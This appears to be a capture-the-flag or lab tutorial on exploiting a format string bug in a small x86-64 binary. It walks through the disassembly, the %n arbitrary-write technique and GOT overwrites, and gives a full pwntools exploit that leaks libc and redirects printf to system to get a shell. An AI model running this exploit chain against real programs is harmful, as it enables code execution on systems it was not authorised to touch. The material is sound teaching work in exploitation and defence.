We will start by inspecting the assembly of our binary.

Condensed, commented output of objdump -d -M intel printf

00000000004011b6 <main>:
  4011b6:       f3 0f 1e fa             endbr64 
  4011ba:       55                      push   rbp
  4011bb:       48 89 e5                mov    rbp,rsp
# Our stackframe is size 0x100
  4011be:       48 81 ec 00 01 00 00    sub    rsp,0x100
# Prints prompt
  4011c5:       48 8d 3d 38 0e 00 00    lea    rdi,[rip+0xe38]        # 402004 <_IO_stdin_used+0x4>
  4011cc:       e8 bf fe ff ff          call   401090 <puts@plt>
# Read our name into a buffer at [rbp-0x100]
  4011d1:       48 8b 15 78 2e 00 00    mov    rdx,QWORD PTR [rip+0x2e78]        # 404050 <stdin@@GLIBC_2.2.5>
  4011d8:       48 8d 85 00 ff ff ff    lea    rax,[rbp-0x100]
  4011df:       be 00 01 00 00          mov    esi,0x100
  4011e4:       48 89 c7                mov    rdi,rax
  4011e7:       e8 c4 fe ff ff          call   4010b0 <fgets@plt>
  4011ec:       48 8d 3d 23 0e 00 00    lea    rdi,[rip+0xe23]        # 402016 <_IO_stdin_used+0x16>
  4011f3:       e8 98 fe ff ff          call   401090 <puts@plt>
# Call printf(buffer)
  4011f8:       48 8d 85 00 ff ff ff    lea    rax,[rbp-0x100]
  4011ff:       48 89 c7                mov    rdi,rax
  401202:       b8 00 00 00 00          mov    eax,0x0
  401207:       e8 94 fe ff ff          call   4010a0 <printf@plt>
# Print a newline
  40120c:       bf 0a 00 00 00          mov    edi,0xa
  401211:       e8 6a fe ff ff          call   401080 <putchar@plt>
# Call exit(0)
  401216:       bf 00 00 00 00          mov    edi,0x0
  40121b:       e8 a0 fe ff ff          call   4010c0 <exit@plt>

From the assembly we can see that the program asks for input and then calls printf(buffer), passing our input as the format string. This looks innocuous, but it can lead to control of the instruction pointer, because the printf conversion %n writes to memory.

The expected usage of %n is to recover the length of the string printed by printf. It writes the number of characters printed so far through a pointer argument.

Consider the following code.

int x;
printf("abc%n\n", &x);
printf("%d\n", x);

// Prints:
// abc
// 3

If we can control the i-th argument to printf, then %i$n lets us write to a memory location of our choosing. Inspecting the stack frame layout shows how we get this control. The stack frame for main will look like:

Note: Zeroes are unreferenced memory, their value may be non-zero at runtime.

rsp (rbp-0x100):  00000000    00000000
rbp-0xf8          00000000    00000000
rbp-0xf0          00000000    00000000
rbp-0xe8          00000000    00000000
rbp-0xe0          00000000    00000000
rbp-0xd8          00000000    00000000
rbp-0xd0          00000000    00000000
rbp-0xc8          00000000    00000000
rbp-0xc0          00000000    00000000
rbp-0xb8          00000000    00000000
rbp-0xb0          00000000    00000000
rbp-0xa8          00000000    00000000
rbp-0xa0          00000000    00000000
rbp-0x98          00000000    00000000
rbp-0x90          00000000    00000000
rbp-0x88          00000000    00000000
rbp-0x80          00000000    00000000
rbp-0x78          00000000    00000000
rbp-0x70          00000000    00000000
rbp-0x68          00000000    00000000
rbp-0x60          00000000    00000000
rbp-0x58          00000000    00000000
rbp-0x50          00000000    00000000
rbp-0x48          00000000    00000000
rbp-0x40          00000000    00000000
rbp-0x38          00000000    00000000
rbp-0x30          00000000    00000000
rbp-0x28          00000000    00000000
rbp-0x20          00000000    00000000
rbp-0x18          00000000    00000000
rbp-0x10          00000000    00000000
rbp-0x8           00000000    00000000
rbp:             [saved rbp] [saved rip]

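Recall that on x86-64 the first six arguments to printf are passed in registers (the format string in rdi, then rsi, rdx, rcx, r8 and r9), so the 7th argument, the one %6$ refers to, is the 8 bytes at rsp. Notice that the buffer we control is in the same region that these arguments come from. If we were to write aaaaaaaa%6$n into our buffer, printf would treat 0x6161616161616161 as a pointer and write 8 (the number of characters printed so far) to that address. The example stack frame would look like: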

Note: Zeroes are unreferenced memory, their value may be non-zero at runtime.

rsp (rbp-0x100):  61616161    61616161
rbp-0xf8          6e243625    0000000a
rbp-0xf0          00000000    00000000
rbp-0xe8          00000000    00000000
rbp-0xe0          00000000    00000000
rbp-0xd8          00000000    00000000
rbp-0xd0          00000000    00000000
rbp-0xc8          00000000    00000000
rbp-0xc0          00000000    00000000
rbp-0xb8          00000000    00000000
rbp-0xb0          00000000    00000000
rbp-0xa8          00000000    00000000
rbp-0xa0          00000000    00000000
rbp-0x98          00000000    00000000
rbp-0x90          00000000    00000000
rbp-0x88          00000000    00000000
rbp-0x80          00000000    00000000
rbp-0x78          00000000    00000000
rbp-0x70          00000000    00000000
rbp-0x68          00000000    00000000
rbp-0x60          00000000    00000000
rbp-0x58          00000000    00000000
rbp-0x50          00000000    00000000
rbp-0x48          00000000    00000000
rbp-0x40          00000000    00000000
rbp-0x38          00000000    00000000
rbp-0x30          00000000    00000000
rbp-0x28          00000000    00000000
rbp-0x20          00000000    00000000
rbp-0x18          00000000    00000000
rbp-0x10          00000000    00000000
rbp-0x8           00000000    00000000
rbp:             [saved rbp] [saved rip]
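
To make the mapping between stack slots and positional arguments concrete, here is a small sketch. The helper name positional_index is made up for illustration, and it assumes the layout shown above: five register arguments after the format string, then 8-byte stack slots starting at rsp.

```python
WORD = 8           # bytes per stack slot on x86-64
REGISTER_ARGS = 5  # rsi, rdx, rcx, r8, r9 (rdi holds the format string)


def positional_index(offset_from_rsp):
    """Return i such that %i$ refers to the slot at rsp + offset_from_rsp."""
    if offset_from_rsp < 0 or offset_from_rsp % WORD:
        raise ValueError("offset must be a non-negative multiple of 8")
    return REGISTER_ARGS + 1 + offset_from_rsp // WORD


print(positional_index(0x0))    # start of our buffer
print(positional_index(0x100))  # saved rbp of main
print(positional_index(0x108))  # saved rip of main
```

With the 0x100-byte buffer above, the buffer covers arguments 6 through 37, which is why the first 8 bytes we type are reachable as %6$.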

We can extend this further to write other values into that memory address by adding a conversion with a field width. The format %100d prints an int padded to 100 characters. The format aaaaaaaa%100d%6$n therefore writes 108 (8 characters of a plus 100 of padding) to memory address 0x6161616161616161; using %92d instead would write exactly 100.
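
The counting is easy to get wrong by a few characters, so here is a toy model of it. This is only a sketch: value_written_by_n is a hypothetical helper, it understands just literal characters and %<width>d, %<width>x and %<width>c, and it assumes each padded conversion prints exactly its field width (one character if no width is given).

```python
import re

# Matches an optional "N$" position, an optional width and one conversion.
TOKEN = re.compile(r"%(?:(\d+)\$)?(\d*)([dxcn])")


def value_written_by_n(fmt):
    """Return the count the first %n in fmt would store, or None."""
    count = 0
    pos = 0
    while pos < len(fmt):
        match = TOKEN.match(fmt, pos)
        if match is None:
            count += 1  # literal character
            pos += 1
            continue
        _, width, conv = match.groups()
        if conv == "n":
            return count
        count += int(width) if width else 1
        pos = match.end()
    return None


for fmt in ("aaaaaaaa%6$n", "aaaaaaaa%100d%6$n", "aaaaaaaa%92d%6$n"):
    print(fmt, "->", value_written_by_n(fmt))
```

The eight literal a characters count toward the total, so the padding has to be the target value minus whatever has already been printed.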

We almost have an arbitrary write. The only issue is that printf stops at the first 00 byte, and real memory addresses usually contain some. The string aaaa\x00\x00\x00\x00%100d%6$n will only print aaaa and never reaches the %n, so it will not overwrite the memory at address 0x0000000061616161. The fix for this is to put our memory address at the end of the payload, after the format specifiers. Unfortunately this usually means a lot of tedious offset calculations. Luckily there are libraries developed exactly for this purpose. I like to use this one: Printf Exploit.
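
To show what those calculations look like, here is a minimal hand-rolled sketch of the address-at-the-end layout. The function build_write and the address 0x404038 are made up for illustration, it assumes the first stack slot is argument 6 as above, and it only handles a single 4-byte %n write of a value of at least 1.

```python
import struct


def build_write(addr, value, first_stack_index=6):
    """Format string that stores `value` at `addr` with a single %n."""
    slots = 1
    while True:
        # The address sits right after `slots` 8-byte slots of format text.
        index = first_stack_index + slots
        fmt = b"%%%dc%%%d$n" % (value, index)
        if len(fmt) <= slots * 8:
            break
        slots += 1
    # Filler comes after %n, so it does not change the value written.
    fmt = fmt.ljust(slots * 8, b"A")
    return fmt + struct.pack("<Q", addr)


payload = build_write(0x404038, 100)
print(payload)
```

Because the 00 bytes of the address now come after every conversion, printf has already processed %n by the time it hits the terminator. A real payload also has to avoid a 0x0a byte in the address, since fgets stops reading at a newline.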

Now that we can overwrite an arbitrary memory address, we can start our exploit.

The global offset table is a very nice target for our exploit. It'd be really nice if we could leak a libc address, overwrite a GOT entry to system@libc and jump to system. This process requires some creative thinking.

A common technique in binary exploitation is to leak an address, then call main again. To do this we can overwrite the GOT entry for exit with the address of main. Since main ends by calling exit, this makes main loop forever, and each iteration gives us another printf(buffer) to work with. We can then leak a pointer. The function main is called by a libc function called __libc_start_main, so if we print main's return address we have a libc leak.

Once we have a libc leak, we can compute the address for system@libc and overwrite the GOT entry for printf. Then if we cause the program to call printf("/bin/sh"), we'll actually call system("/bin/sh") and get a shell.
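
The arithmetic behind this step is simple enough to sketch without pwntools. All three numbers below are hypothetical placeholders, not values from this binary or any particular libc; in the real exploit they come from the leak and from the libc ELF file.

```python
def libc_base_from_leak(leaked_return, return_offset):
    """Recover the libc load address from a leaked return address."""
    base = leaked_return - return_offset
    # Shared libraries are mapped on page boundaries, so a base that is
    # not 4 KiB aligned almost certainly means a wrong leak or offset.
    if base & 0xFFF:
        raise ValueError("libc base is not page aligned")
    return base


LEAK = 0x7F1234567D0A    # hypothetical leaked return address
RETURN_OFFSET = 0x27D0A  # hypothetical offset of that return site in libc
SYSTEM_OFFSET = 0x4F4E0  # hypothetical offset of system in libc

base = libc_base_from_leak(LEAK, RETURN_OFFSET)
system_addr = base + SYSTEM_OFFSET
print(hex(base), hex(system_addr))
```

The alignment check is a cheap way to catch an off-by-one in the argument index before sending the final payload.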

To actually write this exploit we first load our binary and libc with some standard pwntools boilerplate.

from pwn import *
from fmtstr import FormatString

r = process('build/printf')
e = ELF('build/printf')
libc = ELF('/usr/lib/libc.so.6')

# Create a new tmux pane with gdb when using gdb.attach()
context.clear(arch='amd64')
context.terminal = ["tmux", "splitw", "-h"]

We use the format string library to cause main to loop.

# Cause main to loop
# Offset is 6 since the first 5 args are registers
fmt = FormatString(offset=6, written=0, bits=64)
fmt[e.got['exit']] = e.symbols['main']
payload, sig = fmt.build()

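def dump(x):
    # Pretty-print the payload bytes for debugging
    try:
        from hexdump import hexdump
        hexdump(x)
    except ImportError:
        import binascii, textwrap
        # hexlify returns bytes, textwrap.wrap needs str
        print('\n'.join(textwrap.wrap(binascii.hexlify(x).decode('ascii'), 32)))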

dump(payload)

r.sendline(payload)
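
Writing a full address with a single %n would mean printing millions of characters, so format string payloads usually split the value into smaller pieces written with %hn. The sketch below shows one common way to plan those writes. It is an assumption about the general technique, not a description of what FormatString does internally, and both plan_short_writes and the GOT address 0x404038 are made up for illustration.

```python
def plan_short_writes(addr, value, n_bytes=8):
    """Plan 16-bit %hn writes as (target address, extra padding) pairs."""
    chunks = []
    for i in range(0, n_bytes, 2):
        chunks.append((addr + i, (value >> (8 * i)) & 0xFFFF))
    # The printed count can only grow, so write the smallest chunk first.
    chunks.sort(key=lambda chunk: chunk[1])
    plan = []
    written = 0
    for target, chunk in chunks:
        plan.append((target, chunk - written))
        written = chunk
    return plan


# 0x4011b6 is main from the disassembly; 0x404038 is a placeholder.
for target, pad in plan_short_writes(0x404038, 0x4011B6):
    print(hex(target), pad)
```

Each pair says how many more characters to print before the %hn that targets that address, so the total output stays at a few thousand characters.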

Then we leak the address in __libc_start_main that main would return to. We have to account for the fact that main has been entered a second time through the overwritten exit entry without the first call returning, so there's an extra stack frame to skip over. Once we leak this value, we can use pwntools' libc_start_main_return to find the offset in libc of the instruction after the call to main, and subtract it from the leak to get the libc base address.

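# registers - 5 args
# current (second) main frame: buffer - 256/8 = 32 args
# current (second) main frame: saved rbp - 1 arg
# return address pushed by the call to exit (now main) - 1 arg
# first main frame: buffer - 256/8 = 32 args
# first main frame: saved rbp - 1 arg
# 5 + 32 + 1 + 1 + 32 + 1 = 72
# We need to skip the first 72 args to find main's ret address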
leak_str = b"%73$16p"

r.sendline(leak_str)

r.recvuntil(b"0x")
x = r.recvline()
leak = int(x.decode('ascii'), 16)

# Base address of libc in this process
libc_offset = leak - libc.libc_start_main_return
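
The argument count in the comments above generalises to any number of nested main frames. Here is a small sketch of that count; return_address_index is a hypothetical helper and it assumes every frame looks like the one in the disassembly (a 0x100-byte buffer, a saved rbp and a return address).

```python
REGISTER_ARGS = 5          # rsi, rdx, rcx, r8, r9
BUFFER_SLOTS = 0x100 // 8  # 32 stack slots of buffer per frame


def return_address_index(frames):
    """Positional index of the outermost main's saved return address.

    frames is how many times main has been entered (1 = no loop yet).
    """
    if frames < 1:
        raise ValueError("main must have been entered at least once")
    # Each frame contributes its buffer, a saved rbp and a return address.
    return REGISTER_ARGS + frames * (BUFFER_SLOTS + 2)


print(return_address_index(1))
print(return_address_index(2))
```

For two frames this gives 73, matching the %73$16p used above. Every further loop through main pushes the target another 34 arguments away.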

Now we overwrite the GOT entry for printf to be system. After this code finishes we should just be able to type /bin/sh into the next iteration of main and we will get a shell.

fmt = FormatString(offset=6, written=0, bits=64)
fmt[e.got['printf']] = libc_offset + libc.symbols['system']
payload, sig = fmt.build()

# dump() was defined earlier in the script
dump(payload)

r.sendline(payload)

# Hand the session over to the user so we can type /bin/sh
r.interactive()
